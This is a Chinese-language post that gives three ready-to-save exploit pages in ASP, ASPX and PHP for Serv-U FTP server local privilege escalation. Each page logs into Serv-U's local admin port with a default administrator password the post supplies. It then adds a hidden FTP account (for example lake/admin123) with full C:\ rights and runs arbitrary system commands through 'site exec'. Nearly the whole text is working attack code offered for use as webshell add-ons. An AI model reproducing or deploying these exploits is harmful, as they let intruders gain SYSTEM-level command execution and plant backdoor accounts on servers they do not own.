下面代码保存为servu.asp即可,利用了xml组件,建立一个lake 密码为admin123的可执行ftp帐号
Serv-U 2 admin by lake2body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000FF;text-decoration: none;}
a:visited {text-decoration: none;color: #0000FF;}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
Serv-U Local Get SYSTEM Shell with ASP
Author: lake2, " target=_blank>[url]http://lake2.0x54.org
[/url]user:
pwd :
port:
Add User
Del User
Usr = request.Form("duser")
pwd = request.Form("dpwd")
port = request.Form("dport")
'Command = request.Form("dcmd")
if request.Form("radiobutton") = "add" Then
lake2 = "User " & Usr & vbcrlf
lake2 = lake2 & "Pass " & pwd & vbcrlf
lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf
'lake2 = lake2 & "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
lake2 = lake2 & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
'lake2 = lake2 & "quit" & vbcrlf
'--------
'On Error Resume Next
Set xPost = CreateObject("MSXML2.XMLHTTP")
xPost.Open "POST", "[url]http://127.0.0.1:[/url]"& port &"/lake2", True
xPost.Send(lake2)
Set xPOST=nothing
response.write "FTP user lake pass admin123 :)
"
else
lake2 = "User " & Usr & vbcrlf
lake2 = lake2 & "Pass " & pwd & vbcrlf
lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf
lake2 = lake2 & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & " User=lake" & vbcrlf
Set xPost3 = CreateObject("MSXML2.XMLHTTP")
xPost3.Open "POST", "[url]http://127.0.0.1:[/url]"& port &"/lake2", True
xPost3.Send(lake2)
Set xPOST3=nothing
response.write "Done!
"
end if
%>
Only for Enjoy&Challenge
!
下面保存为servu.aspx,利用servu的本地溢出执行命令
'
' Love, Where are you ?
Sub BTN_Start_Click(sender As Object, e As EventArgs)
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
Dim Port As Int32 = Text_Port.Text
Dim Command As String = Text_cmd.Text
Dim LoginUser As String = "User " & Usr & vbcrlf
Dim LoginPass As String = "Pass " & pwd & vbcrlf
Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
Dim DelDomain As String = "-DELETEDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
Dim Quit As String = "QUIT" & vbcrlf
Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf
'Dim client As New TcpClient
Dim tcpClient As New TcpClient()
Try
tcpClient.Connect("127.0.0.1", port)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, NewDomain)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
Dim tcpClient2 As New TcpClient()
Try
tcpClient2.Connect("127.0.0.1", 43859)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient2.ReceiveBufferSize = 1024
Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
Rec(networkStream2)
Send(networkStream2, "User lake" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "pass admin123" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "site exec " & Command & vbcrlf)
Rec(networkStream2)
tcpClient2.Close()
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub
Sub Rec(o As Object)
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write("out:" & returndata & "
")
Else
response.Write("What's wrong ?")
End If
End Sub
Sub Send(o As Object,data As String)
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write("in: " & data & "
")
Else
response.Write("What's wrong ?")
End If
End Sub
from Serv-U 2
admin by lake2
Name
LocalAdministrator
PWD
#l@$ak#.lk;0@P
Port
43958
cmd
下面保存为servu.php,是php版的servu本地溢出程序,可以执行命令。
if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))
{
$sendbuf = "";
$recvbuf = "";
$domain = "-SETDOMAIN\r\n".
"-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
"-TZOEnable=0\r\n".
" TZOKey=\r\n";
$adduser = "-SETUSERSETUP\r\n".
"-IP=0.0.0.0\r\n".
"-PortNo=2121\r\n".
"-User=Will_Be\r\n".
"-Password=Will_Be\r\n".
"-HomeDir=c:\\\r\n".
"-LoginMesFile=\r\n".
"-Disable=0\r\n".
"-RelPaths=1\r\n".
"-NeedSecure=0\r\n".
"-HideHidden=0\r\n".
"-AlwaysAllowLogin=0\r\n".
"-ChangePassword=0\r\n".
"-QuotaEnable=0\r\n".
"-MaxUsersLoginPerIP=-1\r\n".
"-SpeedLimitUp=0\r\n".
"-SpeedLimitDown=0\r\n".
"-MaxNrUsers=-1\r\n".
"-IdleTimeOut=600\r\n".
"-SessionTimeOut=-1\r\n".
"-Expire=0\r\n".
"-RatioUp=1\r\n".
"-RatioDown=1\r\n".
"-RatiosCredit=0\r\n".
"-QuotaCurrent=0\r\n".
"-QuotaMaximum=0\r\n".
"-Maintenance=None\r\n".
"-PasswordType=Regular\r\n".
"-Ratios=None\r\n".
" Access=c:\\|RELP\r\n";
$deldomain="-DELETEDOMAIN\r\n".
"-IP=0.0.0.0\r\n".
" PortNo=2121\r\n";
$sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
$sendbuf = "USER ".$_POST["User"]."\r\n";
fputs($sock, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
$sendbuf = "PASS ".$_POST["Pass"]."\r\n";
fputs($sock, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
$sendbuf = "SITE MAINTENANCE\r\n";
fputs($sock, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
$sendbuf = $domain;
fputs($sock, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
$sendbuf = $adduser;
fputs($sock, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
echo "**********************************************************
";
echo "Starting Exploit ...
";
echo "**********************************************************
";
$exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);
$recvbuf = fgets($exp, 1024);
echo "Recv: $recvbuf
";
$sendbuf = "USER Will_Be\r\n";
fputs($exp, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($exp, 1024);
echo "Recv: $recvbuf
";
$sendbuf = "PASS Will_Be\r\n";
fputs($exp, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($exp, 1024);
echo "Recv: $recvbuf
";
$sendbuf = "site exec ".$_POST["Command"]."\r\n";
fputs($exp, $sendbuf, strlen($sendbuf));
echo "Send: site exec ".$_POST["Command"]."
";
$recvbuf = fgets($exp, 1024);
echo "Recv: $recvbuf
";
echo "**********************************************************
";
echo "Starting Delete Domain ...
";
echo "**********************************************************
";
$sendbuf = $deldomain;
fputs($sock, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
fclose($sock);
fclose($exp);
}
?>
Serv-U Local Exploit By Will_BeLocalPort:
LocalUser:
LocalPass:
Command :